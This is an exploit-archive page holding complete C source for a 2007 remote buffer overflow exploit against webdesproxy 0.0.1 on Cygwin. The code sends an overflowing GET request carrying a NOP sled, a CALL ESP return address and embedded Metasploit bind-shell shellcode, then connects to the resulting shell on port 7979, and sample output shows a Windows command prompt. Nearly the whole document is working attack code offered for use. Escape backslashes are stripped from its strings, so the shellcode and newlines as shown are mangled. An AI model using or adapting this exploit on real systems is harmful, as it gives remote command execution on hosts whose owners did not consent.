[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : webdesproxy 0.0.1 (GET Request) Remote Buffer Overflow Exploit
# Published : 2007-05-12
# Author : vade79
# Previous Title : VImpX ActiveX (VImpX.ocx v. 4.7.3.0) Remote Buffer Overflow Exploit
# Next Title : Morovia Barcode ActiveX Professional 3.3.1304 Arbitrary File Overwrite
/*[ webdesproxy[v0.0.1]: (cygwin) remote buffer overflow exploit. ]*
* *
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* compile: *
* gcc xwdp-cygwin.c -o xwdp-cygwin *
* *
* syntax: *
* ./xwdp-cygwin [-r] -h host -p port *
* *
* webdesproxy homepage/url: *
* http://sourceforge.net/projects/webdesproxy/ *
* http://webdesproxy.sourceforge.net/ *
* *
* I was curious on how cygwin-related (stack) buffer overflows *
* behaved, so i browsed around for opensource cygwin-related *
* projects and this fella popped up. not overly popular, but *
* good for learning/exploration. one interesting note is it is *
* easy to make universal cygwin exploits as cygwin1.dll is *
* usually included with the program, making for possible static *
* jmp/call addresses no matter the windows (SP/Lang) version. *
* (excluding 64bit) *
* *
* Also, webdesproxy fork()s all of its subprocesses, so it *
* doesn't matter if it faults the first time. *
* *
* bug: *
* webdesproxy.c:111:strncpy(mb,myp,mypend-myp); *
* *
* exploitation method: *
* "GET http://[NOPx250][JMP4][EIP/"CALL ESP"][NOPx32][SC]/nn" *
* *
* To find the address needed for the EIP overwrite, use *
* findjmp.exe(the defined/default address should work out of the *
* box as the .dll is included with the program): *
* -------------------------------------------------------------- *
* C:webdesproxy>findjmp.exe cygwin1.dll esp *
* Reg: esp *
* Scanning cygwin1.dll for code usable with the esp register *
* 0x61048690 push esp - ret *
* 0x6104936D jmp esp *
* 0x6112C494 push esp - ret *
* Finished Scanning cygwin1.dll for code usable with the esp r$ *
* Found 3 usable addresses *
* *
* example usage: *
* -------------------------------------------------------------- *
* [v9@fhalo v9]$ ./xwdp-cygwin -h desktop.fakehalo.lan -p 1111 *
* [*] webdesproxy[v0.0.1]: (cygwin) remote buffer overflow exp$ *
* [*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* [*] target: desktop.fakehalo.lan:1111 *
* [*] return address($eip/"CALL ESP"): 0x6104936d *
* [*] attempting to connect: desktop.fakehalo.lan:1111. *
* [*] successfully connected: desktop.fakehalo.lan:1111. *
* [*] sending string: *
* [+] "GET http://[NOPSx250][JMP4][EIP/"CALL ESP"][NOPSx32][S$ *
* [*] closing connection. *
* *
* [*] attempting to connect: desktop.fakehalo.lan:7979. *
* [*] successfully connected: desktop.fakehalo.lan:7979. *
* *
* Microsoft Windows XP [Version 5.1.2600] *
* (C) Copyright 1985-2001 Microsoft Corp. *
* *
* C:cygwin> *
******************************************************************/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <getopt.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFSIZE 1024
#define TIMEOUT 10
#define SPORT 7979
/* (WinXP home SP2. cygwin1.dll is included, so it should match */
/* no matter what. if not, run findjmp.exe on a used dll...) */
/* findjmp.exe cygwin1.dll esp */
/* ... */
/* 0x6104936D jmp esp */
/* ... */
#define DFL_RETADDR 0x6104936D
/* globals. */
/* win32_bind - EXITFUNC=thread LPORT=7979 Size=344 */
/* Encoder=PexFnstenvSub http://metasploit.com */
static char x86_bind[]=
"x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x4b"
"x76x8dx13x83xebxfcxe2xf4xb7x1cx66x5exa3x8fx72xec"
"xb4x16x06x7fx6fx52x06x56x77xfdxf1x16x33x77x62x98"
"x04x6ex06x4cx6bx77x66x5axc0x42x06x12xa5x47x4dx8a"
"xe7xf2x4dx67x4cxb7x47x1ex4axb4x66xe7x70x22xa9x3b"
"x3ex93x06x4cx6fx77x66x75xc0x7axc6x98x14x6ax8cxf8"
"x48x5ax06x9ax27x52x91x72x88x47x56x77xc0x35xbdx98"
"x0bx7ax06x63x57xdbx06x53x43x28xe5x9dx05x78x61x43"
"xb4xa0xebx40x2dx1exbex21x23x01xfex21x14x22x72xc3"
"x23xbdx60xefx70x26x72xc5x14xffx68x75xcax9bx85x11"
"x1ex1cx8fxecx9bx1ex54x1axbexdbxdaxecx9dx25xdex40"
"x18x25xcex40x08x25x72xc3x2dx1ex92x38x2dx25x04xf2"
"xdex1ex29x09x3bxb1xdaxecx9dx1cx9dx42x1ex89x5dx7b"
"xefxdbxa3xfax1cx89x5bx40x1ex89x5dx7bxaex3fx0bx5a"
"x1cx89x5bx43x1fx22xd8xecx9bxe5xe5xf4x32xb0xf4x44"
"xb4xa0xd8xecx9bx10xe7x77x2dx1exeex7exc2x93xe7x43"
"x12x5fx41x9axacx1cxc9x9axa9x47x4dxe0xe1x88xcfx3e"
"xb5x34xa1x80xc6x0cxb5xb8xe0xddxe5x61xb5xc5x9bxec"
"x3ex32x72xc5x10x21xdfx42x1ax27xe7x12x1ax27xd8x42"
"xb4xa6xe5xbex92x73x43x40xb4xa0xe7xecxb4x41x72xc3"
"xc0x21x71x90x8fx12x72xc5x19x89x5dx7bxa4xb8x6dx73"
"x18x89x5bxecx9bx76x8dx13";
struct{
unsigned int addr;
char *host;
unsigned short port;
}tbl;
/* lonely extern. */
extern char *optarg;
/* functions. */
char *getbuf(unsigned int);
unsigned short proxy_connect(char *,unsigned short);
signed int getshell_conn(char *,unsigned short);
void proc_shell(signed int);
void printe(char *,short);
void usage(char *);
void sig_alarm(){printe("alarm/timeout hit.",1);}
/* start. */
int main(int argc,char **argv){
signed int chr=0,rsock=0;
printf("[*] webdesproxy[v0.0.1]: (cygwin) remote buffer overflo"
"w exploit.n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)"
"nn");
tbl.addr=DFL_RETADDR;
while((chr=getopt(argc,argv,"h:p:r:"))!=EOF){
switch(chr){
case 'h':
if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
break;
case 'p':
tbl.port=atoi(optarg);
break;
case 'r':
sscanf(optarg,"%x",&tbl.addr);
break;
default:
usage(argv[0]);
break;
}
}
if(!tbl.host||!tbl.port)usage(argv[0]);
printf("[*] target: %s:%dn",tbl.host,tbl.port);
printf("[*] return address($eip/"CALL ESP"): 0x%.8xn",tbl.addr);
proxy_connect(tbl.host,tbl.port);
rsock=getshell_conn(tbl.host,SPORT);
if(rsock>0)proc_shell(rsock);
exit(0);
}
/* make buf: */
/* "GET http://[NOPSx250][JMP4][EIP/"CALL ESP"][NOPSx32][SHELLCODE]/nn" */
char *getbuf(unsigned int addr){
char *buf;
if(!(buf=(char *)malloc(BUFSIZE+1)))
printe("getbuf(): allocating memory failed.",1);
memset(buf,0,BUFSIZE);
memcpy(buf,"GET http://",11);
memset(buf+11,'x90',250); /* filler/safe spot */
buf[11+250]=0xeb; /* jmp */
buf[11+250+1]=0x04; /* 4 bytes */
*(long *)&buf[11+250+2]=addr; /* new eip, points to call esp. */
memset(buf+11+250+4+2,'x90',32); /* safe spot...just to be safe. */
memcpy(buf+11+250+4+2+32,x86_bind,strlen(x86_bind));
memset(buf+11+250+4+2+32+strlen(x86_bind),'/',1); /* needed to trigger */
memset(buf+11+250+4+2+32+strlen(x86_bind)+1,'n',2); /* nn */
return(buf);
}
/* connects to the vulnerable webdexproxy server. */
unsigned short proxy_connect(char *hostname,unsigned short port){
signed int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf("[*] attempting to connect: %s:%d.n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve hostname.",1);
memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("webdesproxy connection failed.",1);
alarm(0);
printf("[*] successfully connected: %s:%d.n",hostname,port);
sleep(1);
printf("[*] sending string:n");
printf("[+] "GET http://[NOPSx250][JMP4][EIP/"CALL ESP"][NOPSx32]"
"[SHELLCODE]/\n\n"n");
write(sock,getbuf(tbl.addr),BUFSIZE);
sleep(1);
printf("[*] closing connection.nn");
close(sock);
return(0);
}
/* connects to bindshell. */
signed int getshell_conn(char *hostname,unsigned short port){
signed int sock=0;
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell_conn(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell_conn(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
printf("[*] attempting to connect: %s:%d.n",hostname,port);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.n",hostname,port);
exit(1);
}
alarm(0);
printf("[*] successfully connected: %s:%d.nn",hostname,port);
return(sock);
}
/* process the bind/connect-back shell. */
void proc_shell(signed int sock){
signed int r=0;
char buf[4096+1];
fd_set fds;
signal(SIGINT,SIG_IGN);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
/* error! */
void printe(char *err,short e){
printf("[!] %sn",err);
if(e)exit(1);
return;
}
/* usage. */
void usage(char *progname){
printf("syntax: %s [-r] -h host -p portnn",progname);
printf(" -h <host/ip>ttarget hostname/ip.n");
printf(" -p <port>ttarget port.n");
printf(" -r <addr>tdefine return/"CALL ESP" address. (0x%.8x)nn",tbl.addr);
exit(0);
}
// www.Syue.com [2007-05-12]